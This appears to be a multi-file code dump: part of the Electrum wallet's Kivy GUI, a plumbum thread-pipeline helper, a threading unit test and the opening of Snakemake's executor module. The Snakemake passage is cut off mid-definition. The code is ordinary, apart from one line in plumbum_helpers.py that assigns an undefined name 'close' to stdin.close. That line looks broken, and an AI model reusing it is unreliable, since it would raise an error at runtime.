popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name == 'lightning_channels_dialog' and not self.wallet.can_have_lightning():
self.show_error(_("Not available for this wallet.") + "\n\n" +
_("Lightning is currently restricted to HD wallets with p2wpkh addresses."))
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.send_screen = None
self.receive_screen = None
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might be not have focus
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.is_up_to_date() or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
balance_sat = c + u + x + l
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.is_up_to_date():
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return self.electrum_config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if parse_max_spend(x):
return f'max({x})'
# FIXME this is using format_satoshis_plain instead of config.format_amount
# as we sometimes convert the returned string back to numbers,
# via self.get_amount()... the need for converting back should be removed
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_amount_and_units_with_fiat(self, x) -> str:
text = self.format_amount_and_units(x)
fiat = self.fx.format_amount_and_units(x) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.is_up_to_date() or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
self.logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
if self.resume_dialog is not None:
return
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
def on_success(x):
self.resume_dialog = None
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=self.stop)
self.resume_dialog = d
d.open()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, *, show_text_with_qr: bool = True):
if not label.data:
return
self.qr_dialog(label.name, label.data, show_text_with_qr)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble(text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
if amount == '!':
screen.is_max = True
max_amt = self.get_max_amount()
screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else ''
else:
screen.amount = amount
screen.is_max = False
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
else:
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self):
from .uix.dialogs.fee_dialog import FeeDialog
fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status)
fee_dialog.open()
def set_fee_status(self):
target, tooltip, dyn = self.electrum_config.get_fee_target()
self.fee_status = target
def on_fee(self, event, *arg):
self.set_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid password")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
# called if old_password works on self.wallet
self.password = new_password
if self._use_single_password:
path = self.wallet.storage.path
self.stop_wallet()
update_password_for_directory(self.electrum_config, old_password, new_password)
self.load_wallet_by_name(path)
msg = _("Password updated successfully")
else:
self.wallet.update_password(old_password, new_password)
msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path))
self.show_info(msg)
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def pin_code_dialog(self, cb):
if self._use_single_password and self.has_pin_code():
def on_choice(choice):
if choice == 0:
self.change_pin_code(cb)
else:
self.reset_pin_code(cb)
choices = {0:'Change PIN code', 1:'Reset PIN'}
dialog = ChoiceDialog(
_('PIN Code'), choices, 0,
on_choice,
keep_choice_order=True)
dialog.open()
else:
self.change_pin_code(cb)
def reset_pin_code(self, cb):
on_success = lambda x: self._set_new_pin_code(None, cb)
d = PasswordDialog(self,
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success,
on_failure=lambda: None,
is_change=False,
has_password=self.wallet.has_password())
d.open()
def _set_new_pin_code(self, new_pin, cb):
self.electrum_config.set_key('pin_code', new_pin)
cb()
self.show_info(_("PIN updated") if new_pin else _('PIN disabled'))
def change_pin_code(self, cb):
on_failure = lambda: self.show_error(_("PIN not updated"))
on_success = lambda old_pin, new_pin: self._set_new_pin_code(new_pin, cb)
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
backup_dir = self.electrum_config.get_backup_dir()
if backup_dir:
self._save_backup(backup_dir)
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
try:
backup_dir = util.android_backup_dir()
except OSError as e:
self.logger.exception("Cannot save backup")
self.show_error(f"Cannot save backup: {e!r}")
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup(backup_dir))
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self, backup_dir):
try:
new_path = self.wallet.save_backup(backup_dir)
except Exception as e:
self.logger.exception("Failed to save wallet backup")
self.show_error("Failed to save wallet backup" + '\n' + str(e))
return
self.show_info(_("Backup saved:") + f"\n{new_path}")
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.logger.exception("failed to import backup")
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
def lightning_status(self):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
status = _('Enabled')
else:
status = _('Enabled, non-recoverable channels')
else:
if self.wallet.can_have_lightning():
status = _('Not enabled')
else:
status = _("Not available for this wallet.")
return status
def on_lightning_status(self, root):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
pass
else:
if self.wallet.db.get('seed_type') == 'segwit':
msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
self.show_info(msg)
elif self.wallet.can_have_lightning():
root.dismiss()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum. "
"Create lightning keys?")
else:
msg = _(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")
d = Question(msg, self._enable_lightning, title=_('Enable Lightning?'))
d.open()
def _enable_lightning(self, b):
if not b:
return
self.wallet.init_lightning(password=self.password)
self.show_info(_('Lightning keys have been initialized.'))
|
plumbum_helpers.py
|
from __future__ import absolute_import
import functools
import io
import os
import sys
from os import O_CLOEXEC
from os import pipe2
from subprocess import PIPE
from threading import Thread
from plumbum.commands import BaseCommand
from plumbum.machines.base import PopenAddons
from six import reraise
def get_thread(func, args=None, kwargs=None):
return Thread(target=func, args=args, kwargs=kwargs)
class PopenedThread(Thread, PopenAddons):
def wait(self):
self.join()
e = self.exception[0]
if e is not None:
reraise(*e)
self.returncode = 0
return self.returncode
class ThreadCommand(BaseCommand):
__slots__ = ["_func"]
@staticmethod
def _wrapper(func, stdin, stdout, exception):
try:
func(stdin, stdout)
except:
e = sys.exc_info()
exception[0] = e
finally:
# We want writers to get SIGPIPE
stdin.close()
# and readers to get EOF
stdout.close()
def __init__(self, func):
self._func = func
def popen(self, args=(), **kwargs):
bufsize = kwargs.get("bufsize", -1)
stdin = kwargs.get("stdin", sys.stdin)
stdin.close = close
exposed_stdin = None
if stdin == PIPE:
(r, w) = pipe2(O_CLOEXEC)
stdin = io.open(r, "rb", bufsize)
exposed_stdin = io.open(w, "wb", bufsize)
stdout = kwargs.get("stdout", sys.stdout)
exposed_stdout = None
if stdout == PIPE:
(r, w) = pipe2(O_CLOEXEC)
stdout = w
exposed_stdout = io.open(r, "rb", bufsize)
else:
stdout = os.dup(stdout)
stdout = io.open(stdout, "wb", bufsize)
exception = [None]
t = PopenedThread(
target=self._wrapper, args=(self._func, stdin, stdout, exception)
)
t.stdin = exposed_stdin
t.stdout = exposed_stdout
t.stderr = None
t.exception = exception
t.start()
return t
class PipelineToThread(BaseCommand):
__slots__ = ["_cmd", "_func"]
def __init__(self, cmd, func):
self._cmd = cmd
self._func = func
def __repr__(self):
return "%s(%r, %r)" % (type(self).__name__, self._cmd, self._func)
@property
def machine(self):
return self._cmd.machine
def popen(self, args=(), **kwargs):
kwargs = kwargs.copy()
thread_stdout = kwargs.get("stdout", sys.stdout)
kwargs["stdout"] = PIPE
p = self._cmd.popen(bufsize=0, **kwargs)
thread_stdin = p.stdout
# Wrap self._func in order to catch its exceptions (these we will
# re-raise in the main thread. We'll also close the subprocess's
# stdout when the thread exits.
p._thread_exception = None
@functools.wraps(self._func)
def func(*args, **kwargs):
try:
self._func(*args, **kwargs)
except:
e = sys.exc_info()
p._thread_exception = e
finally:
# Let our subprocess know that nobody is reading its output
# anymore. Let any downstream processes know that nobody is
# producing input for it anymore.
thread_stdin.close()
thread_stdout.close()
if thread_stdout == PIPE:
(p2cread, p2cwrite) = pipe2(O_CLOEXEC)
# expose the thread's stdout on the Popen object
p.stdout = io.open(p2cread, "rb")
thread_stdout = p2cwrite
else:
thread_stdout = os.dup(thread_stdout.fileno())
# prevent caller from reading from the subprocess's stdout
# that's not its job.
p.stdout = None
thread_stdout = io.open(thread_stdout, "wb")
t = get_thread(func, args=(thread_stdin, thread_stdout))
original_wait = p.wait
def wait(*args, **kwargs):
code = original_wait(*args, **kwargs)
t.join()
if p._thread_exception:
reraise(*p._thread_exception)
return code
p.wait = wait
t.start()
return p
BaseCommand.__truediv__ = lambda s, o: PipelineToThread(s, o)
|
test_adc_thread_safe.py
|
import threading
import time
import unittest
import mock
from greenpithumb import adc_thread_safe
class AdcTest(unittest.TestCase):
def setUp(self):
self.counter = 0
def increment_counter(self, amount):
# Increment counter in a deliberately inefficient way to invite a race
# condition if this is called by more than one thread at once.
for i in range(amount):
current = self.counter
time.sleep(0.01)
self.counter = current + 1
def test_read_adc_is_thread_safe(self):
raw_adc = mock.Mock()
raw_adc.read_adc.side_effect = lambda x: self.increment_counter(10)
adc = adc_thread_safe.Adc(raw_adc)
threads = []
# Spawn several threads to call read_adc concurrently to see if they
# trigger a race condition.
for _ in range(5):
threads.append(threading.Thread(target=lambda: adc.read_adc(0)))
for t in threads:
t.start()
for t in threads:
t.join()
# Check that the threads incremented the counter correctly.
self.assertEqual(10 * 5, self.counter)
|
__init__.py
|
__author__ = "Johannes Köster"
__copyright__ = "Copyright 2021, Johannes Köster"
__email__ = "johannes.koester@uni-due.de"
__license__ = "MIT"
import os
import sys
import contextlib
import time
import datetime
import json
import textwrap
import stat
import shutil
import shlex
import threading
import concurrent.futures
import subprocess
import signal
import tempfile
from functools import partial
from itertools import chain
from collections import namedtuple
from snakemake.io import _IOFile
import random
import base64
import uuid
import re
import math
from snakemake.jobs import Job
from snakemake.shell import shell
from snakemake.logging import logger
from snakemake.stats import Stats
from snakemake.utils import format, Unformattable, makedirs
from snakemake.io import get_wildcard_names, Wildcards
from snakemake.exceptions import print_exception, get_exception_origin
from snakemake.exceptions import format_error, RuleException, log_verbose_traceback
from snakemake.exceptions import (
ProtectedOutputException,
WorkflowError,
ImproperShadowException,
SpawnedJobError,
CacheMissException,
)
from snakemake.common import Mode, __version__, get_container_image, get_uuid
# TODO move each executor into a separate submodule
def sleep():
# do not sleep on CI. In that case we just want to quickly test everything.
if os.environ.get("CI") != "true":
time.sleep(10)
class AbstractExecutor:
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
printthreads=True,
latency_wait=3,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
self.dag = dag
self.quiet = quiet
self.printreason = printreason
self.printshellcmds = printshellcmds
self.printthreads = printthreads
self.latency_wait = latency_wait
self.keepincomplete = keepincomplete
self.keepmetadata = keepmetadata
def get_default_remote_provider_args(self):
if self.workflow.default_remote_provider:
return (
" --default-remote-provider {} " "--default-remote-prefix {} "
).format(
self.workflow.default_remote_provider.__module__.split(".")[-1],
self.workflow.default_remote_prefix,
)
return ""
def _format_key_value_args(self, flag, kwargs):
if kwargs:
return " {} {} ".format(
flag,
" ".join("{}={}".format(key, value) for key, value in kwargs.items()),
)
return ""
def get_set_threads_args(self):
return self._format_key_value_args(
"--set-threads", self.workflow.overwrite_threads
)
def get_set_scatter_args(self):
return self._format_key_value_args(
"--set-scatter", self.workflow.overwrite_scatter
)
def get_default_resources_args(self):
if self.workflow.default_resources.args is not None:
def fmt(res):
if isinstance(res, str):
res = res.replace('"', r"\"")
return '"{}"'.format(res)
args = " --default-resources {} ".format(
" ".join(map(fmt, self.workflow.default_resources.args))
)
return args
return ""
def get_behavior_args(self):
if self.workflow.conda_not_block_search_path_envvars:
return " --conda-not-block-search-path-envvars "
return ""
def run_jobs(self, jobs, callback=None, submit_callback=None, error_callback=None):
"""Run a list of jobs that is ready at a given point in time.
By default, this method just runs each job individually.
This method can be overwritten to submit many jobs in a more efficient way than one-by-one.
Note that in any case, for each job, the callback functions have to be called individually!
"""
for job in jobs:
self.run(
job,
callback=callback,
submit_callback=submit_callback,
error_callback=error_callback,
)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
"""Run a specific job or group job."""
self._run(job)
callback(job)
def shutdown(self):
pass
def cancel(self):
pass
def _run(self, job):
job.check_protected_output()
self.printjob(job)
def rule_prefix(self, job):
return "local " if job.is_local else ""
def printjob(self, job):
job.log_info(skip_dynamic=True)
def print_job_error(self, job, msg=None, **kwargs):
job.log_error(msg, **kwargs)
def handle_job_success(self, job):
pass
def handle_job_error(self, job):
pass
class DryrunExecutor(AbstractExecutor):
def printjob(self, job):
super().printjob(job)
if job.is_group():
for j in job.jobs:
self.printcache(j)
else:
self.printcache(job)
def printcache(self, job):
if self.workflow.is_cached_rule(job.rule):
if self.workflow.output_file_cache.exists(job):
logger.info(
"Output file {} will be obtained from global between-workflow cache.".format(
job.output[0]
)
)
else:
logger.info(
"Output file {} will be written to global between-workflow cache.".format(
job.output[0]
)
)
class RealExecutor(AbstractExecutor):
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
assume_shared_fs=True,
keepincomplete=False,
keepmetadata=False,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.assume_shared_fs = assume_shared_fs
self.stats = Stats()
self.snakefile = workflow.main_snakefile
def register_job(self, job):
job.register()
def _run(self, job, callback=None, error_callback=None):
super()._run(job)
self.stats.report_job_start(job)
try:
self.register_job(job)
except IOError as e:
logger.info(
"Failed to set marker file for job started ({}). "
"Snakemake will work, but cannot ensure that output files "
"are complete in case of a kill signal or power loss. "
"Please ensure write permissions for the "
"directory {}".format(e, self.workflow.persistence.path)
)
def handle_job_success(
self,
job,
upload_remote=True,
handle_log=True,
handle_touch=True,
ignore_missing_output=False,
):
job.postprocess(
upload_remote=upload_remote,
handle_log=handle_log,
handle_touch=handle_touch,
ignore_missing_output=ignore_missing_output,
latency_wait=self.latency_wait,
assume_shared_fs=self.assume_shared_fs,
keep_metadata=self.keepmetadata,
)
self.stats.report_job_end(job)
def handle_job_error(self, job, upload_remote=True):
job.postprocess(
error=True,
assume_shared_fs=self.assume_shared_fs,
latency_wait=self.latency_wait,
)
def get_additional_args(self):
"""Return a string to add to self.exec_job that includes additional
arguments from the command line. This is currently used in the
ClusterExecutor and CPUExecutor, as both were using the same
code. Both have base class of the RealExecutor.
"""
additional = ""
if not self.workflow.cleanup_scripts:
additional += " --skip-script-cleanup "
if self.workflow.shadow_prefix:
additional += " --shadow-prefix {} ".format(self.workflow.shadow_prefix)
if self.workflow.use_conda:
additional += " --use-conda "
if self.workflow.conda_prefix:
additional += " --conda-prefix {} ".format(self.workflow.conda_prefix)
if self.workflow.use_singularity:
additional += " --use-singularity "
if self.workflow.singularity_prefix:
additional += " --singularity-prefix {} ".format(
self.workflow.singularity_prefix
)
if self.workflow.singularity_args:
additional += ' --singularity-args "{}"'.format(
self.workflow.singularity_args
)
if not self.workflow.execute_subworkflows:
additional += " --no-subworkflows"
if self.workflow.use_env_modules:
additional += " --use-envmodules"
if not self.keepmetadata:
additional += " --drop-metadata"
return additional
def format_job_pattern(self, pattern, job=None, **kwargs):
overwrite_workdir = []
if self.workflow.overwrite_workdir:
overwrite_workdir.extend(("--directory", self.workflow.overwrite_workdir))
overwrite_config = []
if self.workflow.overwrite_configfiles:
# add each of the overwriting configfiles in the original order
if self.workflow.overwrite_configfiles:
overwrite_config.append("--configfiles")
overwrite_config.extend(self.workflow.overwrite_configfiles)
if self.workflow.config_args:
overwrite_config.append("--config")
overwrite_config.extend(self.workflow.config_args)
printshellcmds = ""
if self.workflow.printshellcmds:
printshellcmds = "-p"
if not job.is_branched and not job.is_updated:
# Restrict considered rules. This does not work for updated jobs
# because they need to be updated in the spawned process as well.
rules = ["--allowed-rules"]
rules.extend(job.rules)
else:
rules = []
target = kwargs.get("target", job.get_targets())
snakefile = kwargs.get("snakefile", self.snakefile)
cores = kwargs.get("cores", self.cores)
if "target" in kwargs:
del kwargs["target"]
if "snakefile" in kwargs:
del kwargs["snakefile"]
if "cores" in kwargs:
del kwargs["cores"]
cmd = format(
pattern,
job=job,
attempt=job.attempt,
overwrite_workdir=overwrite_workdir,
overwrite_config=overwrite_config,
printshellcmds=printshellcmds,
workflow=self.workflow,
snakefile=snakefile,
cores=cores,
benchmark_repeats=job.benchmark_repeats if not job.is_group() else None,
target=target,
rules=rules,
**kwargs,
)
return cmd
class TouchExecutor(RealExecutor):
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
try:
# Touching of output files will be done by handle_job_success
time.sleep(0.1)
callback(job)
except OSError as ex:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job, ignore_missing_output=True)
_ProcessPoolExceptions = (KeyboardInterrupt,)
try:
from concurrent.futures.process import BrokenProcessPool
_ProcessPoolExceptions = (KeyboardInterrupt, BrokenProcessPool)
except ImportError:
pass
class CPUExecutor(RealExecutor):
def __init__(
self,
workflow,
dag,
workers,
printreason=False,
quiet=False,
printshellcmds=False,
use_threads=False,
latency_wait=3,
cores=1,
